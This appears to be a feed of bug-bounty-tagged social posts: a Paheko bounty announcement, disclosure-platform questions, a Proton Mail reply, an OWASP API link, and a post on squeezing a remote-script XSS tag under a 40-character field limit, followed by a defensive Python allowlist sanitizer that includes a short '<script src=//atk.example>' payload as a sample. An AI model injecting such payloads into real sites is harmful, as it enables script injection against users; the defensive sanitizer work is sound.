We are opening our bug bounty programme for #paheko!
This means that if you look for and find security vulnerabilities in Paheko, we can reward you. The amount of the reward will depend on the severity of the vulnerability. We have set aside €1000 for now, an amount that may change depending on the reports we receive.
A partial security audit will also take place in the coming months.
Do we have, in France and in French, a non-profit ethical platform for disclosing cyber vulnerabilities?
Something like openbugbounty?
If so, which one?
@rwxrwx The issue was fixed in early July 2022. The non-web Proton Mail apps were never affected. At the time the issue was reported, we also conducted a thorough analysis of our available spam and virus filter logs and found no evidence of this attack in the wild except for the proof-of-concept reported to us. This is consistent with the attack's difficulty and the unlikely series of user actions required to make it work.
I had a field that allows HTML but the length is limited to 40 server side, so I couldn't do much. So I registered the domain https://XXX.cc and could load a remote script from <script src=//https://xxx.cc></script>, which fits in 30, and got it working nicely. #bugbounty
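Added example, not code from the post's author: an allowlist sanitizer built on Python's standard-library HTML parser, showing why a server-side length cap is no defence for a field that accepts HTML. A remote-script tag in the shape the post describes fits comfortably under 40 characters; only rebuilding the markup from an allowlist neutralises it. The tag/attribute policy and the atk.example placeholder domain are assumptions.

```python
from html import escape
from html.parser import HTMLParser

# Assumed policy: the few tags and attributes a short rich-text field may keep.
ALLOWED_TAGS = {"b", "i", "em", "strong", "p", "br", "a"}
ALLOWED_ATTRS = {"a": {"href"}}
SAFE_HREF_PREFIXES = ("http://", "https://", "/")
DROP_WITH_CONTENT = {"script", "style"}  # tag and its body are removed

class AllowlistSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.drop_depth = [], 0  # drop_depth > 0 inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self.drop_depth += 1
            return
        if tag not in ALLOWED_TAGS or self.drop_depth:
            return  # unknown tag (img, iframe, ...) is removed, its text is kept
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, ()):
                continue  # silently drops on* handlers, style, srcdoc, ...
            value = (value or "").strip()
            if name == "href" and not value.lower().startswith(SAFE_HREF_PREFIXES):
                continue  # rejects javascript:, data:, vbscript: URLs
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self.drop_depth = max(0, self.drop_depth - 1)
        elif tag in ALLOWED_TAGS and tag != "br" and not self.drop_depth:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.drop_depth:
            self.out.append(escape(data, quote=False))

def sanitize(fragment: str) -> str:
    # Rebuilds the fragment from the allowlist; everything else is escaped or dropped.
    parser = AllowlistSanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out)

# Constructed payload in the shape the post describes (atk.example is a placeholder):
# 35 characters, so a 40-character length cap does nothing to stop it.
SHORT_PAYLOAD = "<script src=//atk.example></script>"
```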
@kkarhan @thijs typically we can trust companies with bank stuff. It's not like they could find you if they wanted if you committed crimes. It's also good for your branding as a hacker.
If you've seen the updated OWASP API Top 10 you may be a bit confused by the "Authorisation" vulnerabilities - aren't they all just explaining the same thing? Here's a breakdown of the 4 access control issues you commonly see in APIs 👇👇 https://www.craft.me/s/CysIiph247P5AQ #bugbountytips #BugBounty